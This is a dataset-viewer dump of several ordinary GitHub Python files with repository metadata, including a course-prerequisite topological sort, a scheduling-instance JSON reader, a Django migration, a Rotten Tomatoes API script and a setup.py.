#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 27 23:32:30 2019
@author: sensenliu
"""
import collections
class Solution:
"""
@param: numCourses: a total of n courses
@param: prerequisites: a list of prerequisite pairs
@return: true if can finish all courses or false
"""
def canFinish(self, numCourses, prerequisites):
edges, degrees = self.getInDegree(prerequisites, numCourses) ;
starter = []
for course in degrees:
if degrees[course] == 0:
starter.append(course)
if len(starter) == 0:
return False
queue = collections.deque(starter) ;
takeCount = 0 ;
while queue:
node = queue.popleft() ;
takeCount += 1 ;
for following in edges[node]:
degrees[following] -= 1 ;
if degrees[following] == 0 :
queue.append(following) ;
return takeCount == numCourses
def getInDegree(self, prerequisites, N):
courseInDeg = {x: 0 for x in range(N)}
courseUnlock = {x: [] for x in range(N)}
for pair in prerequisites:
later = pair[0]
before = pair[1]
courseInDeg[later] += 1 ;
courseUnlock[before].append(later) ;
return courseUnlock, courseInDeg ;
test = Solution();
N = 4 ;
testIn = [[1,0],[2,1], [3,1]] ;
print(test.canFinish(N,testIn))
|
[
"noreply@github.com"
] |
SensenLiu123.noreply@github.com
|
70481dfca210aaeeac25ae9910116f061fd30640
|
69c16c8c20ad93bbeda827976af9778c1d3e2037
|
/test.py
|
3fc6d033ec62f8a20124c12402645580551d4912
|
[] |
no_license
|
JanMigon/Diffusion-mri
|
53eda28937d372e6b22e8a2788264675e4ff8a6e
|
aea2c5cb2f71508e2d822a28735380a37df5dada
|
refs/heads/master
| 2023-01-05T23:14:34.326676
| 2020-11-05T23:34:33
| 2020-11-05T23:47:27
| 304,928,675
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 161
|
py
|
import utils.utils as ul
if __name__ == '__main__':
my_sphere = ul.create_sphere(30)
print(my_sphere.x)
print(my_sphere.y)
print(my_sphere.z)
|
[
"jan.migon@consonance.tech"
] |
jan.migon@consonance.tech
|
814c6fd7060a1240475c7dece4774f55f274730e
|
0c2cc932b65ff8b966d360647dda85f3e7d037c3
|
/src/analyzer/reader.py
|
f7d25ba590b4720c5a539951d7077be9c2fc3248
|
[] |
no_license
|
Yuhuishishishi/TP3S_generator
|
3c819045ced04a6135400034af23f136e0dd2390
|
7efb88a8741b934372e157809e5ed1fa39e5d43c
|
refs/heads/master
| 2021-01-12T15:17:24.268905
| 2016-10-19T18:39:22
| 2016-10-19T18:39:22
| 71,748,534
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,506
|
py
|
import json
from collections import defaultdict
from json.encoder import JSONEncoder
class TestRequest:
def __init__(self, tid, release, prep, tat, analysis, deadline):
self.tid = tid
self.release = release
self.prep = prep
self.tat = tat
self.analysis = analysis
self.deadline = deadline
@property
def dur(self):
return self.prep + self.tat + self.analysis
def __repr__(self):
return str(self.tid), str(self.release), str(self.dur), str(self.deadline)
def json_repr(self):
o = self
return dict(test_id=int(o.tid), release=int(o.release), deadline=int(o.deadline),
prep=int(o.prep), tat=int(o.tat), analysis=int(o.analysis),
dur=int(o.dur))
class Vehicle:
def __init__(self, vid, release):
self.vid = vid
self.release = release
def __repr__(self):
return str(self.vid), str(self.release)
def json_repr(self):
o = self
return dict(release=int(o.release), vehicle_id=int(o.vid))
# ========================================== json encoders ==================================
class Instance:
def __init__(self, test_arr, vehicle_arr, rehit_rules):
self.test_arr = test_arr
self.vehicle_arr = vehicle_arr
self.rehit_rules = rehit_rules
@property
def num_test(self):
return len(self.test_arr)
@property
def num_vehicle(self):
return len(self.vehicle_arr)
def json_repr(self):
rehit = defaultdict(dict)
for pair in self.rehit_rules:
first, second = pair
rehit[str(first)][str(second)] = self.rehit_rules[pair]
return dict(tests=self.test_arr, vehicles=self.vehicle_arr, rehit=rehit)
class TP3SInstanceEncoder(JSONEncoder):
def default(self, o):
if hasattr(o, "json_repr"):
return o.json_repr()
return super(TP3SInstanceEncoder, self).default(o)
class TP3SReader:
def __init__(self, path_list):
self.path_list = path_list
self.inst_list = []
def read_instances(self):
for path in self.path_list:
with open(path) as f:
data = f.read()
j = json.loads(data)
inst = _create_instance_from_json(j)
self.inst_list.append(inst)
return self.inst_list
def _create_instance_from_json(j):
test_arr = _parse_tests(j)
vehicle_arr = _parse_vehicles(j)
rehit_rules = _parse_rehit_rules(j)
inst = Instance(test_arr, vehicle_arr, rehit_rules)
return inst
def _parse_vehicles(j):
data = j["vehicles"]
vehicle_arr = [Vehicle(v["vehicle_id"], v["release"]) for v in data]
vehicle_arr.sort(key=lambda x: x.release)
return vehicle_arr
def _parse_tests(j):
test_arr = []
data = j["tests"]
for t in data:
tid = t["test_id"]
prep = t["prep"]
tat = t["tat"]
analysis = t["analysis"]
release = t["release"]
deadline = t["deadline"]
new_test = TestRequest(tid, release, prep, tat, analysis, deadline)
test_arr.append(new_test)
# sorting
test_arr.sort(key=lambda x: x.tid)
return test_arr
def _parse_rehit_rules(j):
data = j["rehit"]
rehit_rules = {}
for k, inner in data.iteritems():
id1 = int(k)
for k2, rule in inner.iteritems():
id2 = int(k2)
rehit_rules[id1, id2] = rule
return rehit_rules
|
[
"yuhuishi@umich.edu"
] |
yuhuishi@umich.edu
|
00ecc7fbb843e969fbfd7a31805b5eea1a3b5d4f
|
7407f652a1384587a3479b37c0f7e76d6b602715
|
/thesis.py
|
04a641dac95f5277b7155a44256bc2bb4547b8cc
|
[
"MIT"
] |
permissive
|
ysmiraak/darc
|
01e6e79547399075cfbbee09f1c0248d87295aa3
|
1a34401d4bba8f98d4bb42801907d002ba2355a6
|
refs/heads/master
| 2021-01-22T18:15:14.677755
| 2018-04-11T19:46:25
| 2018-04-11T19:46:25
| 85,071,770
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,254
|
py
|
# from thesis_atomic import Setup
# from thesis_binary import Setup
# from thesis_onehot import Setup
from thesis_summed import Setup
if '__main__' == __name__:
trial = 0
use_form = False
use_lemma = False
embed_const = None
embed_dropout = 0
train_path = "./thesis/train/"
embed_path = "./thesis/embed/"
parse_path = "./thesis/parse/"
def train_parse(lang):
setup = Setup.make(
"{}{}-ud-train.conllu".format(train_path, lang)
, form_w2v="{}{}-form{}.w2v".format(embed_path, lang, 32 if use_lemma else 64) if use_form else None
, lemm_w2v="{}{}-lemm32.w2v".format(embed_path, lang) if use_lemma else None
, binary=True
, proj=False)
model = setup.model(embed_const=embed_const, embed_dropout=embed_dropout)
sents = list(conllu.load("{}{}-ud-dev.conllu".format(train_path, lang)))
for epoch in range(25):
setup.train(model, verbose=2)
conllu.save((setup.parse(model, sent) for sent in sents)
, "{}{}-t{:02d}-e{:02d}.conllu".format(parse_path, lang, trial, epoch))
for lang in 'ar bg eu fa fi_ftb grc he hr it la_proiel nl pl sv tr zh'.split():
train_parse(lang)
|
[
"ysmiraak@gmail.com"
] |
ysmiraak@gmail.com
|
caaec7f00c39cee1f2a533e95c4aab888c2cfb41
|
33a7b06dd3175fd0ecb84d24f735d352d8f7c04a
|
/data_base/migrations/0005_auto_20160513_1733.py
|
19f96a9f261f6827f3b976c09a0102f38ac90abb
|
[] |
no_license
|
ryotayamazaki/function_data_base
|
5b5fddedd249bbbb92acf8152d2c0825921f46d1
|
ac9fa690b31e39d2b161d6004fbeea8071ef12f6
|
refs/heads/master
| 2021-01-01T05:12:33.642822
| 2016-05-19T02:41:17
| 2016-05-19T02:41:17
| 58,899,741
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 579
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-05-13 08:33
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('data_base', '0004_auto_20160513_1729'),
]
operations = [
migrations.AlterField(
model_name='proglam',
name='link',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='proglam', to='data_base.Pkg', verbose_name='pkg'),
),
]
|
[
"ryota0723@hotmailco.jp"
] |
ryota0723@hotmailco.jp
|
011729a8bb480085313e1073b0ab7d063cae6d85
|
1c6283303ceb883add8de4ee07c5ffcfc2e93fab
|
/Jinja2/lib/python3.7/site-packages/uhd_restpy/testplatform/sessions/ixnetwork/globals/apperrors/error/error.py
|
8a6a225b6b0a0b27a24d8d7e610bec841bc6c21d
|
[] |
no_license
|
pdobrinskiy/devcore
|
0f5b3dfc2f3bf1e44abd716f008a01c443e14f18
|
580c7df6f5db8c118990cf01bc2b986285b9718b
|
refs/heads/main
| 2023-07-29T20:28:49.035475
| 2021-09-14T10:02:16
| 2021-09-14T10:02:16
| 405,919,390
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,992
|
py
|
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from uhd_restpy.base import Base
from uhd_restpy.files import Files
from typing import List, Any, Union
class Error(Base):
"""This node is a specific application error instance
The Error class encapsulates a list of error resources that are managed by the system.
A list of resources can be retrieved from the server using the Error.find() method.
"""
__slots__ = ()
_SDM_NAME = 'error'
_SDM_ATT_MAP = {
'Description': 'description',
'ErrorCode': 'errorCode',
'ErrorLevel': 'errorLevel',
'InstanceCount': 'instanceCount',
'LastModified': 'lastModified',
'Name': 'name',
'Provider': 'provider',
'SourceColumns': 'sourceColumns',
'SourceColumnsDisplayName': 'sourceColumnsDisplayName',
}
_SDM_ENUM_MAP = {
'errorLevel': ['kAnalysis', 'kCount', 'kError', 'kMessage', 'kWarning'],
}
def __init__(self, parent, list_op=False):
super(Error, self).__init__(parent, list_op)
@property
def Instance(self):
"""
Returns
-------
- obj(uhd_restpy.testplatform.sessions.ixnetwork.globals.apperrors.error.instance.instance.Instance): An instance of the Instance class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from uhd_restpy.testplatform.sessions.ixnetwork.globals.apperrors.error.instance.instance import Instance
if self._properties.get('Instance', None) is not None:
return self._properties.get('Instance')
else:
return Instance(self)
@property
def Description(self):
# type: () -> str
"""
Returns
-------
- str: The description of the error
"""
return self._get_attribute(self._SDM_ATT_MAP['Description'])
@property
def ErrorCode(self):
# type: () -> int
"""
Returns
-------
- number: The error code of the error
"""
return self._get_attribute(self._SDM_ATT_MAP['ErrorCode'])
@property
def ErrorLevel(self):
# type: () -> str
"""
Returns
-------
- str(kAnalysis | kCount | kError | kMessage | kWarning): The error level of the error
"""
return self._get_attribute(self._SDM_ATT_MAP['ErrorLevel'])
@property
def InstanceCount(self):
# type: () -> int
"""
Returns
-------
- number: The number of instances of the error
"""
return self._get_attribute(self._SDM_ATT_MAP['InstanceCount'])
@property
def LastModified(self):
# type: () -> str
"""
Returns
-------
- str:
"""
return self._get_attribute(self._SDM_ATT_MAP['LastModified'])
@property
def Name(self):
# type: () -> str
"""
Returns
-------
- str: The name of the error
"""
return self._get_attribute(self._SDM_ATT_MAP['Name'])
@property
def Provider(self):
# type: () -> str
"""
Returns
-------
- str: The error provider of the error
"""
return self._get_attribute(self._SDM_ATT_MAP['Provider'])
@property
def SourceColumns(self):
# type: () -> List[str]
"""
Returns
-------
- list(str): If the error content originated from an xml meta file, these are the source column names if any for this error.
"""
return self._get_attribute(self._SDM_ATT_MAP['SourceColumns'])
@property
def SourceColumnsDisplayName(self):
# type: () -> List[str]
"""
Returns
-------
- list(str):
"""
return self._get_attribute(self._SDM_ATT_MAP['SourceColumnsDisplayName'])
def add(self):
"""Adds a new error resource on the json, only valid with config assistant
Returns
-------
- self: This instance with all currently retrieved error resources using find and the newly added error resources available through an iterator or index
Raises
------
- Exception: if this function is not being used with config assistance
"""
return self._add_xpath(self._map_locals(self._SDM_ATT_MAP, locals()))
def find(self, Description=None, ErrorCode=None, ErrorLevel=None, InstanceCount=None, LastModified=None, Name=None, Provider=None, SourceColumns=None, SourceColumnsDisplayName=None):
# type: (str, int, str, int, str, str, str, List[str], List[str]) -> Error
"""Finds and retrieves error resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve error resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all error resources from the server.
Args
----
- Description (str): The description of the error
- ErrorCode (number): The error code of the error
- ErrorLevel (str(kAnalysis | kCount | kError | kMessage | kWarning)): The error level of the error
- InstanceCount (number): The number of instances of the error
- LastModified (str):
- Name (str): The name of the error
- Provider (str): The error provider of the error
- SourceColumns (list(str)): If the error content originated from an xml meta file, these are the source column names if any for this error.
- SourceColumnsDisplayName (list(str)):
Returns
-------
- self: This instance with matching error resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of error data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the error resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
|
[
"pdobrinskiy@yahoo.com"
] |
pdobrinskiy@yahoo.com
|
308d40adb060c2029a8b7a9892d344f31366ef2f
|
78c5363fc44bf1f67cdc9fc8d6bbbbdd153c7258
|
/scripts/concat_pandas_tables.py
|
447cf02e36aac6c201d9cc29378a1b865273355e
|
[] |
no_license
|
AlBi-HHU/manchot-gut-microbiome-workflow
|
80cfc1614548729b94e05b861bf20fb3b1b6c6c5
|
e1d569ff3ac058f4f978ed452fc21ceb5d4417d9
|
refs/heads/master
| 2023-08-08T23:18:00.369593
| 2023-07-06T14:22:20
| 2023-07-06T14:22:20
| 514,261,475
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 102
|
py
|
import pandas as pd
pd.concat([pd.read_csv(x) for x in snakemake.input]).to_csv(snakemake.output[0])
|
[
"philipp.spohr@hhu.de"
] |
philipp.spohr@hhu.de
|
a9b2d8b50ac2ee4382734c96c0765709c3b27417
|
b7accc88f6f2a8b0bec5c0862f8a73e20ade0f0a
|
/run_rt.py
|
2ac98dbad4bf5a88951ffcbed2a4d5b48b76d6df
|
[] |
no_license
|
jrl-labs/getglue
|
f3fdb656c56ac687528955b19301bee61b0a1646
|
7aadf22e848b43d17020249649feefd7b15850c4
|
refs/heads/master
| 2021-01-11T18:15:34.420068
| 2013-05-24T15:14:21
| 2013-05-24T15:14:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,570
|
py
|
import rt_module
import requests
import yaml
import json
###############################################################################
# Load my API credentials into a dictionary
###############################################################################
with open('conf/auth.yml', 'r') as f:
credentials = yaml.safe_load(f)
key = credentials['rt']['key']
###############################################################################
# Cut and paste from an RT example
###############################################################################
# Three example urls
# The exact same thing from the example, or what you stuck in your web browser
#
#url = 'http://api.rottentomatoes.com/api/public/v1.0/movies.json'
#url = 'http://api.rottentomatoes.com/api/public/v1.0/movies/770672122/reviews.json?apikey=' + key
url = 'http://api.rottentomatoes.com/api/public/v1.0/movies.json?apikey='+key+'&q=terminator&page_limit=1'
# Get back the requests object
r = requests.get(url)
# Extract a dictionary from the json
movies = r.json
###############################################################################
# Use the module!
###############################################################################
movies = rt_module.query_moviename('terminator', key)
#
movieid = movies['movies'][0]['id']
#
# # reviews is a list of dictionaries.
# # Each of these will be loaded by R into the row of a table.
reviews = rt_module.movieid_2_reviews(movieid, key)
#
# Dump json to file
with open('reviews.json', 'w') as f:
json.dump(reviews, f)
|
[
"ianlangmore@gmail.com"
] |
ianlangmore@gmail.com
|
7605b0c861febf51a1e02f89589fe89fa4307fce
|
4db51c9d106a2070d8abc2e006d50555db447459
|
/setup.py
|
64bf68a18d61f7a367fb8baa3ac07e5a1e621edf
|
[] |
no_license
|
strange012/tutor_temp
|
e055af060de318b74453bd0c69f60fc69b067bdb
|
5dc267bb5342d1795d7c410c5e98655be265ee2b
|
refs/heads/master
| 2022-11-28T06:11:25.958049
| 2019-06-06T23:57:21
| 2019-06-06T23:57:21
| 174,526,554
| 0
| 0
| null | 2022-11-22T03:28:52
| 2019-03-08T11:33:45
|
Python
|
UTF-8
|
Python
| false
| false
| 1,225
|
py
|
import os
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, 'README.txt')) as f:
README = f.read()
with open(os.path.join(here, 'CHANGES.txt')) as f:
CHANGES = f.read()
requires = [
'pyramid',
'pyramid_debugtoolbar',
'pyramid_mako',
'pyramid_tm',
'SQLAlchemy',
'transaction',
'zope.sqlalchemy',
'waitress',
]
setup(
name='banner_editor',
version='0.0',
description='banner_editor',
long_description=README + '\n\n' + CHANGES,
classifiers=[
"Programming Language :: Python",
"Framework :: Pyramid",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Internet :: WWW/HTTP :: WSGI :: Application",
],
author='Maksim N.',
author_email='maksimn@ronis.mail',
url='',
keywords='web wsgi bfg pylons pyramid',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
test_suite='banner_editor',
install_requires=requires,
entry_points="""\
[paste.app_factory]
main = banner_editor:main
[console_scripts]
initialize_banner_editor_db = banner_editor.scripts.initializedb:main
""",
)
|
[
"javamexx@rambler.ru"
] |
javamexx@rambler.ru
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.